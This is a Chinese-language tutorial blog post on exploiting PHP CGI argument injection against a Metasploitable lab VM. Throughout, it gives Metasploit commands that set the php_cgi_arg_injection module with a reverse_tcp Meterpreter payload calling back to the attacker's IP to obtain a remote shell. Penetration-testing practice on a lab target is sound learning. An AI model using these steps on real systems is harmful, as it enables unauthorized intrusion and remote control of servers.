端口80 php方式入侵

这次我们来点特别的透过Php注入来得到端口80的使用权. 根据我了解到的php版本5.2.4, 5.3.12, 5.4.2都是比较容易实施php注入的版本, 所以这次我们就使用Metasploitable为我们准备的Php 5.2.4版本当然你也可以透过扫描来识别php版本信息.
Ps.你只需要打开浏览器输入[Metasploitable IP地址]/phpinfo.php就可以了.

透过扫描得到phpinfo, 我就两个步骤带过.

1.扫描目标是否打开了80端口

2.打开Metasploit # msfconsole
使用Payload > use auxiliary/scanner/http/http_version
查看配置 >  show options
设定你的目标IP地址 > set RHOSTS 192.168.1.166
开始检查 > run
看到你的php版本信息 

信息足够后让我们开始渗透
3. 重新打开你的Metasploit # msfconsole
这里教大家一个指令当输入到一半忘记了后半段的指令可以使用tab + tab找出后半部有可能的指令.
调用Paylaod > use exploit/multi/http/php_cgi_arg_injection

4.查看配置文件 > show options
设定目标IP地址 > set RHOSTS [Metasploitable IP地址]

 5.这里就要比较留意一点因为我们再加载多一个Payload.
加载Tcp反弹Payload > set payload php/meterpreter/reverse_tcp
查看配置 > show options

 6.设定Tcp反弹回来的地址这里要填写自己的IP地址可以使用#ifconfig查看如果你是使用网卡就是wlan0的IP地址

设定你自己的IP地址>set LHOST [自己的IP地址]

7.攻击 > exploit
显示得到了session 1 opened 成功反弹了Meterpreter的shell.

8.使用指令确认是不是Meterpreter shell. GET
查看系统信息 > sysinfo

退出也是输入: exit指令就可以了.

感谢阅读

No comments:

Post a Comment